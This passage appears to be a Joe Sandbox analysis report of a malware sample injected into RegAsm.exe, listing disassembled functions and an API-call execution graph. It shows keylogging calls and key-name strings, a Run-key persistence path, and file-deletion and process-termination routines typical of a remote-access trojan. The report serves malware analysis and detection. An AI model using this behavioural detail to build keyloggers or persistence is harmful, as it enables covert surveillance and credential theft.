                                                                                                                                                                      • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                                                                                      • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                                                                                        • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                                                                                                                                                        • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                                                                                        • Part of subcall function 0040A41B: GetKeyboardLayout.USER32 ref: 0040A464
                                                                                                                                                                        • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                                                                                        • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                                                                                                                                                        • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A49C
                                                                                                                                                                        • Part of subcall function 0040A41B: ToUnicodeEx.USER32 ref: 0040A4FC
                                                                                                                                                                        • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                                                                                      • String ID: [AltL]$[AltR]
                                                                                                                                                                      • API String ID: 2738857842-2658077756
                                                                                                                                                                      • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                      • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                                                                                      • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                                                                                      APIs
                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                      • String ID: !D@$open
                                                                                                                                                                      • API String ID: 587946157-1586967515
                                                                                                                                                                      • Opcode ID: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                      • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                                                                                      • Opcode Fuzzy Hash: 4c61eaa6548ee28cdb1e2a4907ffc3a5f6acbad4bc53697dcaba2df13cd2f041
                                                                                                                                                                      • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: State
                                                                                                                                                                      • String ID: [CtrlL]$[CtrlR]
                                                                                                                                                                      • API String ID: 1649606143-2446555240
                                                                                                                                                                      • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                      • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                                                                                      • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer__onexit
                                                                                                                                                                      • String ID: ,kG$0kG
                                                                                                                                                                      • API String ID: 1881088180-2015055088
                                                                                                                                                                      • Opcode ID: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                                                      • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e3451c1f808ccc17589ee43c3bbf287c043e9bd68a58e8b3248af8f7871f884
                                                                                                                                                                      • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteOpenValue
                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                      • API String ID: 2654517830-1051519024
                                                                                                                                                                      • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                      • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                                                                                                                                                      • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                                                                                                                                      • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                      • String ID: pth_unenc
                                                                                                                                                                      • API String ID: 3325800564-4028850238
                                                                                                                                                                      • Opcode ID: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                      • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                                                                                                                                                      • Opcode Fuzzy Hash: abbea0d7173f6b15884b0e8937d7cb34f61697f5a4d448918d1cd9e56a781f81
                                                                                                                                                                      • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                                                                                                                                                      APIs
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                                                      • String ID: pth_unenc
                                                                                                                                                                      • API String ID: 1872346434-4028850238
                                                                                                                                                                      • Opcode ID: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                                                      • Instruction ID: 30425768eaae71e8f6d4d073063fb5581f05561c6d480f36d281b696a9d2b878
                                                                                                                                                                      • Opcode Fuzzy Hash: a2eb2d9afd673111ff5afcc9fde18e5bb16fff8f446b795bb15600cc5347fa32
                                                                                                                                                                      • Instruction Fuzzy Hash: DBD01234149312FFD7310F60EE4DB443B589705362F140361F439552F1C7A589D4AB58
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00440D85
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1717984340-0
                                                                                                                                                                      • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                      • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                                                                                                                                                      • Opcode Fuzzy Hash: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                                                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                                                                                                                                                      • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000013.00000002.642234277.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_19_2_400000_RegAsm.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4100373531-0
                                                                                                                                                                      • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                                      • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                                                                                      • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                                                                                      • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:5.7%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                      Total number of Limit Nodes:60
                                                                                                                                                                      execution_graph 37717 4466f4 37736 446904 37717->37736 37719 446700 GetModuleHandleA 37722 446710 __set_app_type __p__fmode __p__commode 37719->37722 37721 4467a4 37723 4467ac __setusermatherr 37721->37723 37724 4467b8 37721->37724 37722->37721 37723->37724 37737 4468f0 _controlfp 37724->37737 37726 4467bd _initterm GetEnvironmentStringsW _initterm 37727 44681e GetStartupInfoW 37726->37727 37728 446810 37726->37728 37730 446866 GetModuleHandleA 37727->37730 37738 41276d 37730->37738 37734 446896 exit 37735 44689d _cexit 37734->37735 37735->37728 37736->37719 37737->37726 37739 41277d 37738->37739 37781 4044a4 LoadLibraryW 37739->37781 37741 412785 37742 412789 37741->37742 37787 414b81 37741->37787 37742->37734 37742->37735 37745 4127c8 37791 412465 memset ??2@YAPAXI 37745->37791 37747 4127ea 37803 40ac21 37747->37803 37752 412813 37821 40dd07 memset 37752->37821 37753 412827 37826 40db69 memset 37753->37826 37756 412822 37848 4125b6 ??3@YAXPAX DeleteObject 37756->37848 37758 40ada2 _wcsicmp 37759 41283d 37758->37759 37759->37756 37762 412863 CoInitialize 37759->37762 37831 41268e 37759->37831 37761 412966 37849 40b1ab free free 37761->37849 37847 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37762->37847 37766 41296f 37850 40b633 37766->37850 37768 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37773 412957 CoUninitialize 37768->37773 37778 4128ca 37768->37778 37773->37756 37774 4128d0 TranslateAcceleratorW 37775 412941 GetMessageW 37774->37775 37774->37778 37775->37773 37775->37774 37776 412909 IsDialogMessageW 37776->37775 37776->37778 37777 4128fd IsDialogMessageW 37777->37775 37777->37776 37778->37774 37778->37776 37778->37777 37779 41292b TranslateMessage DispatchMessageW 37778->37779 37780 41291f IsDialogMessageW 37778->37780 37779->37775 37780->37775 37780->37779 37782 4044f3 37781->37782 37786 4044cf FreeLibrary 37781->37786 37784 404507 MessageBoxW 37782->37784 37785 40451e 37782->37785 37784->37741 37785->37741 37786->37782 37788 414b8a 37787->37788 37789 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37787->37789 37854 40a804 memset 37788->37854 37789->37745 37792 4124e0 37791->37792 37793 412505 ??2@YAPAXI 37792->37793 37794 41251c 37793->37794 37799 412521 37793->37799 37876 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37794->37876 37865 444722 37799->37865 37802 41259b wcscpy 37802->37747 37881 40b1ab free free 37803->37881 37807 40ad4b 37816 40ad76 37807->37816 37905 40a9ce 37807->37905 37808 40a9ce malloc memcpy free free 37809 40ac5c 37808->37809 37809->37807 37809->37808 37811 40ace7 free 37809->37811 37809->37816 37885 40a8d0 37809->37885 37897 4099f4 37809->37897 37811->37809 37815 40a8d0 7 API calls 37815->37816 37882 40aa04 37816->37882 37817 40ada2 37818 40adc9 37817->37818 37819 40adaa 37817->37819 37818->37752 37818->37753 37819->37818 37820 40adb3 _wcsicmp 37819->37820 37820->37818 37820->37819 37910 40dce0 37821->37910 37823 40dd3a GetModuleHandleW 37915 40dba7 37823->37915 37827 40dce0 3 API calls 37826->37827 37828 40db99 37827->37828 37987 40dae1 37828->37987 38001 402f3a 37831->38001 37833 412766 37833->37756 37833->37762 37834 4126d3 _wcsicmp 37835 4126a8 37834->37835 37835->37833 37835->37834 37837 41270a 37835->37837 38035 4125f8 7 API calls 37835->38035 37837->37833 38004 411ac5 37837->38004 37847->37768 37848->37761 37849->37766 37851 40b640 37850->37851 37852 40b639 free 37850->37852 37853 40b1ab free free 37851->37853 37852->37851 37853->37742 37855 40a83b GetSystemDirectoryW 37854->37855 37856 40a84c wcscpy 37854->37856 37855->37856 37861 409719 wcslen 37856->37861 37859 40a881 LoadLibraryW 37860 40a886 37859->37860 37860->37789 37862 409724 37861->37862 37863 409739 wcscat LoadLibraryW 37861->37863 37862->37863 37864 40972c wcscat 37862->37864 37863->37859 37863->37860 37864->37863 37866 444732 37865->37866 37867 444728 DeleteObject 37865->37867 37877 409cc3 37866->37877 37867->37866 37869 412551 37870 4010f9 37869->37870 37871 401130 37870->37871 37872 401134 GetModuleHandleW LoadIconW 37871->37872 37873 401107 wcsncat 37871->37873 37874 40a7be 37872->37874 37873->37871 37875 40a7d2 37874->37875 37875->37802 37875->37875 37876->37799 37880 409bfd memset wcscpy 37877->37880 37879 409cdb CreateFontIndirectW 37879->37869 37880->37879 37881->37809 37883 40aa14 37882->37883 37884 40aa0a free 37882->37884 37883->37817 37884->37883 37886 40a8eb 37885->37886 37887 40a8df wcslen 37885->37887 37888 40a906 free 37886->37888 37889 40a90f 37886->37889 37887->37886 37893 40a919 37888->37893 37890 4099f4 3 API calls 37889->37890 37890->37893 37891 40a932 37895 4099f4 3 API calls 37891->37895 37892 40a929 free 37894 40a93e memcpy 37892->37894 37893->37891 37893->37892 37894->37809 37896 40a93d 37895->37896 37896->37894 37898 409a41 37897->37898 37899 4099fb malloc 37897->37899 37898->37809 37901 409a37 37899->37901 37902 409a1c 37899->37902 37901->37809 37903 409a30 free 37902->37903 37904 409a20 memcpy 37902->37904 37903->37901 37904->37903 37906 40a9e7 37905->37906 37907 40a9dc free 37905->37907 37909 4099f4 3 API calls 37906->37909 37908 40a9f2 37907->37908 37908->37815 37909->37908 37934 409bca GetModuleFileNameW 37910->37934 37912 40dce6 wcsrchr 37913 40dcf5 37912->37913 37914 40dcf9 wcscat 37912->37914 37913->37914 37914->37823 37935 44db70 37915->37935 37919 40dbfd 37938 4447d9 37919->37938 37922 40dc34 wcscpy wcscpy 37964 40d6f5 37922->37964 37923 40dc1f wcscpy 37923->37922 37926 40d6f5 3 API calls 37927 40dc73 37926->37927 37928 40d6f5 3 API calls 37927->37928 37929 40dc89 37928->37929 37930 40d6f5 3 API calls 37929->37930 37931 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37930->37931 37970 40da80 37931->37970 37934->37912 37936 40dbb4 memset memset 37935->37936 37937 409bca GetModuleFileNameW 37936->37937 37937->37919 37940 4447f4 37938->37940 37939 40dc1b 37939->37922 37939->37923 37940->37939 37941 444807 ??2@YAPAXI 37940->37941 37942 44481f 37941->37942 37943 444873 _snwprintf 37942->37943 37944 4448ab wcscpy 37942->37944 37977 44474a 8 API calls 37943->37977 37946 4448bb 37944->37946 37978 44474a 8 API calls 37946->37978 37947 4448a7 37947->37944 37947->37946 37949 4448cd 37979 44474a 8 API calls 37949->37979 37951 4448e2 37980 44474a 8 API calls 37951->37980 37953 4448f7 37981 44474a 8 API calls 37953->37981 37955 44490c 37982 44474a 8 API calls 37955->37982 37957 444921 37983 44474a 8 API calls 37957->37983 37959 444936 37984 44474a 8 API calls 37959->37984 37961 44494b 37985 44474a 8 API calls 37961->37985 37963 444960 ??3@YAXPAX 37963->37939 37965 44db70 37964->37965 37966 40d702 memset GetPrivateProfileStringW 37965->37966 37967 40d752 37966->37967 37968 40d75c WritePrivateProfileStringW 37966->37968 37967->37968 37969 40d758 37967->37969 37968->37969 37969->37926 37971 44db70 37970->37971 37972 40da8d memset 37971->37972 37973 40daac LoadStringW 37972->37973 37974 40dac6 37973->37974 37974->37973 37976 40dade 37974->37976 37986 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37974->37986 37976->37756 37977->37947 37978->37949 37979->37951 37980->37953 37981->37955 37982->37957 37983->37959 37984->37961 37985->37963 37986->37974 37997 409b98 GetFileAttributesW 37987->37997 37989 40daea 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37989->37990 37996 40db63 37989->37996 37998 40d65d GetPrivateProfileStringW 37990->37998 37992 40db3e 37999 40d65d GetPrivateProfileStringW 37992->37999 37994 40db4f 38000 40d65d GetPrivateProfileStringW 37994->38000 37996->37758 37997->37989 37998->37992 37999->37994 38000->37996 38036 40eaff 38001->38036 38005 411ae2 memset 38004->38005 38006 411b8f 38004->38006 38077 409bca GetModuleFileNameW 38005->38077 38018 411a8b 38006->38018 38008 411b0a wcsrchr 38009 411b22 wcscat 38008->38009 38010 411b1f 38008->38010 38078 414770 wcscpy wcscpy wcscpy CloseHandle 38009->38078 38010->38009 38012 411b67 38079 402afb 38012->38079 38016 411b7f 38135 40ea13 SendMessageW memset SendMessageW 38016->38135 38019 402afb 27 API calls 38018->38019 38020 411ac0 38019->38020 38021 4110dc 38020->38021 38022 41113e 38021->38022 38027 4110f0 38021->38027 38160 40969c LoadCursorW SetCursor 38022->38160 38024 411143 38161 4032b4 38024->38161 38179 444a54 38024->38179 38025 4110f7 _wcsicmp 38025->38027 38026 411157 38028 40ada2 _wcsicmp 38026->38028 38027->38022 38027->38025 38182 410c46 10 API calls 38027->38182 38031 411167 38028->38031 38029 4111af 38031->38029 38032 4111a6 qsort 38031->38032 38032->38029 38035->37835 38037 40eb10 38036->38037 38050 40e8e0 38037->38050 38040 40eb6c memcpy memcpy 38041 40ebe1 38040->38041 38042 40ebb7 38040->38042 38041->38040 38043 40ebf2 ??2@YAPAXI ??2@YAPAXI 38041->38043 38042->38041 38044 40d134 16 API calls 38042->38044 38045 40ec2e ??2@YAPAXI 38043->38045 38048 40ec65 38043->38048 38044->38042 38045->38048 38060 40ea7f 38048->38060 38049 402f49 38049->37835 38051 40e8f2 38050->38051 38052 40e8eb ??3@YAXPAX 38050->38052 38053 40e900 38051->38053 38054 40e8f9 ??3@YAXPAX 38051->38054 38052->38051 38055 40e911 38053->38055 38056 40e90a ??3@YAXPAX 38053->38056 38054->38053 38057 40e931 ??2@YAPAXI ??2@YAPAXI 38055->38057 38058 40e921 ??3@YAXPAX 38055->38058 38059 40e92a ??3@YAXPAX 38055->38059 38056->38055 38057->38040 38058->38059 38059->38057 38061 40aa04 free 38060->38061 38062 40ea88 38061->38062 38063 40aa04 free 38062->38063 38064 40ea90 38063->38064 38065 40aa04 free 38064->38065 38066 40ea98 38065->38066 38067 40aa04 free 38066->38067 38068 40eaa0 38067->38068 38069 40a9ce 4 API calls 38068->38069 38070 40eab3 38069->38070 38071 40a9ce 4 API calls 38070->38071 38072 40eabd 38071->38072 38073 40a9ce 4 API calls 38072->38073 38074 40eac7 38073->38074 38075 40a9ce 4 API calls 38074->38075 38076 40ead1 38075->38076 38076->38049 38077->38008 38078->38012 38136 40b2cc 38079->38136 38081 402b0a 38082 40b2cc 27 API calls 38081->38082 38083 402b23 38082->38083 38084 40b2cc 27 API calls 38083->38084 38085 402b3a 38084->38085 38086 40b2cc 27 API calls 38085->38086 38087 402b54 38086->38087 38088 40b2cc 27 API calls 38087->38088 38089 402b6b 38088->38089 38090 40b2cc 27 API calls 38089->38090 38091 402b82 38090->38091 38092 40b2cc 27 API calls 38091->38092 38093 402b99 38092->38093 38094 40b2cc 27 API calls 38093->38094 38095 402bb0 38094->38095 38096 40b2cc 27 API calls 38095->38096 38097 402bc7 38096->38097 38098 40b2cc 27 API calls 38097->38098 38099 402bde 38098->38099 38100 40b2cc 27 API calls 38099->38100 38101 402bf5 38100->38101 38102 40b2cc 27 API calls 38101->38102 38103 402c0c 38102->38103 38104 40b2cc 27 API calls 38103->38104 38105 402c23 38104->38105 38106 40b2cc 27 API calls 38105->38106 38107 402c3a 38106->38107 38108 40b2cc 27 API calls 38107->38108 38109 402c51 38108->38109 38110 40b2cc 27 API calls 38109->38110 38111 402c68 38110->38111 38112 40b2cc 27 API calls 38111->38112 38113 402c7f 38112->38113 38114 40b2cc 27 API calls 38113->38114 38115 402c99 38114->38115 38116 40b2cc 27 API calls 38115->38116 38117 402cb3 38116->38117 38118 40b2cc 27 API calls 38117->38118 38119 402cd5 38118->38119 38120 40b2cc 27 API calls 38119->38120 38121 402cf0 38120->38121 38122 40b2cc 27 API calls 38121->38122 38123 402d0b 38122->38123 38124 40b2cc 27 API calls 38123->38124 38125 402d26 38124->38125 38126 40b2cc 27 API calls 38125->38126 38127 402d3e 38126->38127 38128 40b2cc 27 API calls 38127->38128 38129 402d59 38128->38129 38130 40b2cc 27 API calls 38129->38130 38131 402d78 38130->38131 38132 40b2cc 27 API calls 38131->38132 38133 402d93 38132->38133 38134 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38133->38134 38134->38016 38135->38006 38139 40b58d 38136->38139 38138 40b2d1 38138->38081 38140 40b5a4 GetModuleHandleW FindResourceW 38139->38140 38141 40b62e 38139->38141 38142 40b5c2 LoadResource 38140->38142 38144 40b5e7 38140->38144 38141->38138 38143 40b5d0 SizeofResource LockResource 38142->38143 38142->38144 38143->38144 38144->38141 38152 40afcf 38144->38152 38146 40b608 memcpy 38155 40b4d3 memcpy 38146->38155 38148 40b61e 38156 40b3c1 18 API calls 38148->38156 38150 40b626 38157 40b04b 38150->38157 38153 40b04b ??3@YAXPAX 38152->38153 38154 40afd7 ??2@YAPAXI 38153->38154 38154->38146 38155->38148 38156->38150 38158 40b051 ??3@YAXPAX 38157->38158 38159 40b05f 38157->38159 38158->38159 38159->38141 38160->38024 38162 4032c4 38161->38162 38163 40b633 free 38162->38163 38164 403316 38163->38164 38183 44553b 38164->38183 38168 403480 38381 40368c 15 API calls 38168->38381 38170 403489 38171 40b633 free 38170->38171 38173 403495 38171->38173 38172 40333c 38172->38168 38174 4033a9 memset memcpy 38172->38174 38175 4033ec wcscmp 38172->38175 38379 4028e7 11 API calls 38172->38379 38380 40f508 6 API calls 38172->38380 38173->38026 38174->38172 38174->38175 38175->38172 38177 403421 _wcsicmp 38177->38172 38180 444a64 FreeLibrary 38179->38180 38181 444a83 38179->38181 38180->38181 38181->38026 38182->38027 38184 445548 38183->38184 38185 445599 38184->38185 38382 40c768 38184->38382 38186 4455a8 memset 38185->38186 38328 4457f2 38185->38328 38466 403988 38186->38466 38192 4455e5 38201 445672 38192->38201 38211 44560f 38192->38211 38194 4458bb memset memset 38198 414c2e 16 API calls 38194->38198 38196 4459ed 38202 445a00 memset memset 38196->38202 38203 445b22 38196->38203 38197 44595e memset memset 38204 414c2e 16 API calls 38197->38204 38205 4458f9 38198->38205 38199 44557a 38206 44558c 38199->38206 38446 4136c0 38199->38446 38477 403fbe memset memset memset memset memset 38201->38477 38208 414c2e 16 API calls 38202->38208 